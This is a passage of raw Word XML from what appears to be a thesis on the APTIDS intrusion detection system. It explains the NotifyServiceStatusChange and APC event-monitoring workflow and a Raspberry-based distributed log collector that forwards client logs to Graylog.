        <w:t xml:space="preserve"> in the way that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs </w:t>
      </w:r>
      <w:r w:rsidR="00094EB9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>asynchronously</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> from SvcChangeNotify thread. Therefore, to</w:t>
      </w:r>
      <w:r w:rsidR="00094EB9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> capture and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00094EB9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>run NotifyCallback whenever SCM event occurs, SvcChangeNotify must be set in an alert-able state. Tt passed the SCM event handler to WaitForSingleObject, this API then waits infinitely until a SCM event occurs, captures the event by alerting on the event and execute the APC function which is the NotifyCallback.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00094EB9" w:rsidRDefault="00094EB9" w:rsidP="00047AC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B53B6" w:rsidRDefault="005A10E7" w:rsidP="00C56305">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The workflows for NotifyServiceStatusChange, APC and their cooperative mates are described in the following figure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D33EA" w:rsidRDefault="00DC3F5C" w:rsidP="009D33EA">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DF7B23A" wp14:editId="7B2ADE14">
            <wp:extent cx="5581650" cy="52616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1650" cy="5261610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A10E7" w:rsidRPr="009D33EA" w:rsidRDefault="009D33EA" w:rsidP="009D33EA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc484886356"/>
      <w:r w:rsidRPr="009D33EA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009D33EA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> NotifyServiceStatusChange and APC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w:rsidR="00130C5A" w:rsidRDefault="009D33EA" w:rsidP="00AC6309">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>The workflows can be explained as follow:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D33EA" w:rsidRDefault="009D33EA" w:rsidP="009D33EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>SvcChangeNotify calls NotifyServiceStatusChange for monitoring SCM events. NotifyServiceStatusChange takes these arguments for running:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D33EA" w:rsidRDefault="00DC3F5C" w:rsidP="009D33EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>A SCM handle that returned from OpenSCManager.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3F5C" w:rsidRDefault="00DC3F5C" w:rsidP="009D33EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>A Callback Context storing the arguments for the Callback function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3F5C" w:rsidRDefault="00DC3F5C" w:rsidP="009D33EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>A SCM Event Hander for handling SCM event.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3F5C" w:rsidRDefault="00DC3F5C" w:rsidP="007D6443">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3F5C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>A Pointer to the Callback function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3F5C" w:rsidRDefault="00DC3F5C" w:rsidP="007D6443">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Callback function that points to NotifyCallback</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3F5C" w:rsidRDefault="00DC3F5C" w:rsidP="007D6443">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>An object of the SERVICE_NOTIFY struct that stores pointer to (b), (c), (d), (e).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3F5C" w:rsidRDefault="00DC3F5C" w:rsidP="00DC3F5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NotifyServiceStatusChange then create an APC queue for NotifyCallback when called.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3F5C" w:rsidRDefault="00DC3F5C" w:rsidP="00DC3F5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>SvcChangeNotify calls WaitForSingleObject to wait for SCM event happens.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3F5C" w:rsidRDefault="00DC3F5C" w:rsidP="00DC3F5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>WaitForSingleObject set the thread to alertable state which will capture and execute APC function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3F5C" w:rsidRDefault="00DC3F5C" w:rsidP="00DC3F5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>When an SCM event occurs, NotifyCallback is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3F5C" w:rsidRPr="00DC3F5C" w:rsidRDefault="00DC3F5C" w:rsidP="00DC3F5C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3F5C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E646DE" w:rsidRPr="00130C5A" w:rsidRDefault="00E646DE" w:rsidP="00130C5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E445CE" w:rsidRDefault="007D6443" w:rsidP="00E445CE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc484963003"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Distributed </w:t>
      </w:r>
      <w:r w:rsidR="00E445CE">
        <w:t>Log Collector Hardware</w:t>
      </w:r>
      <w:r w:rsidR="00E2646F">
        <w:t xml:space="preserve"> (2/6)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w:rsidR="007D6443" w:rsidRPr="007D6443" w:rsidRDefault="007D6443" w:rsidP="007D6443">
      <w:r>
        <w:t>The role of a</w:t>
      </w:r>
      <w:r w:rsidR="00C21216">
        <w:t xml:space="preserve"> Distributed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Log Collector Hardware</w:t>
      </w:r>
      <w:r w:rsidR="00C21216">
        <w:t xml:space="preserve"> (DLCH)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the concept of this thesis is a distributed log collector server, which has been implemented in an opensource hardware device (such as Raspberry). We aim to create a log server that can store log for hundr</w:t>
      </w:r>
      <w:r w:rsidR="003024F5">
        <w:t>eds of devices simultaneously. Its main function is simple, just stay silently and collecting log that is sent from the agent integrated in APTIDS. W</w:t>
      </w:r>
      <w:r>
        <w:t>hen rec</w:t>
      </w:r>
      <w:r w:rsidR="003024F5">
        <w:t>eiving the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> log, </w:t>
      </w:r>
      <w:r w:rsidR="00C21216">
        <w:t>DLCH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> writes the log down to its storage system for Graylog Collector Sidecar to collect and send them to the Graylog server.   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1554A" w:rsidRPr="00A1554A" w:rsidRDefault="00A1554A" w:rsidP="00A1554A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc484963004"/>
      <w:r>
        <w:t>Log Collector Hardware architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w:rsidR="00A1554A" w:rsidRDefault="00A1554A" w:rsidP="00A1554A">
      <w:r>
        <w:t>The architecture of Log Collector Hardware can be graphically described in the figure below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134A20" w:rsidRDefault="00E26D9F" w:rsidP="00134A20">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28C0FF6D" wp14:editId="357056EC">
            <wp:extent cx="5581650" cy="50971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1650" cy="5097145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134A20" w:rsidRPr="00134A20" w:rsidRDefault="00134A20" w:rsidP="00134A20">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc484886357"/>
      <w:r w:rsidRPr="00134A20">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00134A20">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Distributed Log Collector Hardware architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w:rsidR="00F4418A" w:rsidRDefault="00F4418A" w:rsidP="00A1554A"/>
    <w:p w:rsidR="00F4418A" w:rsidRDefault="00F4418A" w:rsidP="00A1554A"/>
    <w:p w:rsidR="00F4418A" w:rsidRPr="00F4418A" w:rsidRDefault="00C63970" w:rsidP="00F4418A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc484963005"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Distributed </w:t>
      </w:r>
      <w:r w:rsidR="00F4418A">
        <w:t>Log Collector Hardware workflow</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w:rsidR="00C63970" w:rsidRDefault="00137AE0" w:rsidP="00F4418A">
      <w:r>
        <w:t xml:space="preserve">Distributed </w:t>
      </w:r>
      <w:r w:rsidR="00F4418A">
        <w:t>Log Collector Hardware is a log collector server which is deployed in an opensource hardware for collecting log from APTIDS’s module. Since APTIDS run silently in the background, its log collector and sending module is called whenever APTIDS module detects any critical change (which is predefined in the configure file</w:t>
      </w:r>
      <w:r w:rsidR="00C63970">
        <w:t xml:space="preserve">s). A single </w:t>
      </w:r>
      <w:r>
        <w:t>DLCH</w:t>
      </w:r>
      <w:r w:rsidR="00C63970">
        <w:t xml:space="preserve"> can store log for up to more than 200 clients that connect simultaneously. For managing each client, </w:t>
      </w:r>
      <w:r>
        <w:t>DLCH</w:t>
      </w:r>
      <w:r w:rsidR="00C63970">
        <w:t xml:space="preserve"> store a log file that has a prefix is the hostname and the Operating System version of the specific client. Since each client host in a domain or windows workgroup must have a different name, their IP could change frequently due to the operation of DHCP, but their specified hostname rarely changes. Manage client’s log base on his hostname and windows version seems more precisely. When a hostname is change, </w:t>
      </w:r>
      <w:r>
        <w:t>DLCH</w:t>
      </w:r>
      <w:r w:rsidR="00C63970">
        <w:t xml:space="preserve"> and APTIDS generate a new log file for this client, the old log file is abandoned. According to figure 3.5, the workflows for Log Collector Hardware are explained as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A1B99" w:rsidRPr="009A1B99" w:rsidRDefault="009A1B99" w:rsidP="00C63970">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>APTIDS.exe calls its modules for monitoring critical behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A1B99" w:rsidRPr="009A1B99" w:rsidRDefault="009A1B99" w:rsidP="00C63970">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>When a module recognizes that there is some critical event which the module was defined to monitor, it captures that event information and calls a function for handling the log.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A1B99" w:rsidRPr="009A1B99" w:rsidRDefault="009A1B99" w:rsidP="009A1B99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The log function first writes the log to specific files for storing the main log, then it writes to a specified temperamental file that is read by another function for sending log to </w:t>
      </w:r>
      <w:r w:rsidR="00137AE0">
        <w:t>DLCH</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137AE0" w:rsidRPr="00137AE0" w:rsidRDefault="009A1B99" w:rsidP="009A1B99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For sending log to the </w:t>
      </w:r>
      <w:r w:rsidR="00137AE0">
        <w:t>DLCH, APTIDS must know the hostname and its windows version. When starting for the first time, APTIDS gets the hostname and windows version, stores them to a file called “System.info” for maintaining that information. When sending log, log function read the localhost information, sends the log along with the local hostname and windows version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137AE0" w:rsidRPr="00137AE0" w:rsidRDefault="00137AE0" w:rsidP="009A1B99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>To communicate with DLCH, the sending module first connects to a predefined port, which is set to 56789, for receiving further information for setting up a communicating channel. That predefined port is just for receiving communicating request from clients, it is not a channel for sending and receiving log data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137AE0" w:rsidRPr="00137AE0" w:rsidRDefault="00137AE0" w:rsidP="009A1B99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>After a client connected to the default port, DLCH now gets a random usable port from the system and sends the port number back to APTIDS on the client host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26D9F" w:rsidRPr="00E26D9F" w:rsidRDefault="00137AE0" w:rsidP="009A1B99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Client now connects the received port and establish a TCP channel for sending log to DLCH. APTIDS </w:t>
      </w:r>
      <w:r w:rsidR="00E26D9F">
        <w:t>sends</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the client hostname, windows version and the log buffer to DLCH. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26D9F" w:rsidRPr="00E26D9F" w:rsidRDefault="00E26D9F" w:rsidP="00E26D9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>On receiving the log string, DLCH writes that string to a log file that has name combine from the hostname, the windows version and a “.log” extension.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26D9F" w:rsidRPr="00E26D9F" w:rsidRDefault="00E26D9F" w:rsidP="00E26D9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Graylog Collector Sidecar capture the information that has been written to those log file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D8127C" w:rsidRPr="00D8127C" w:rsidRDefault="00E26D9F" w:rsidP="00E26D9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
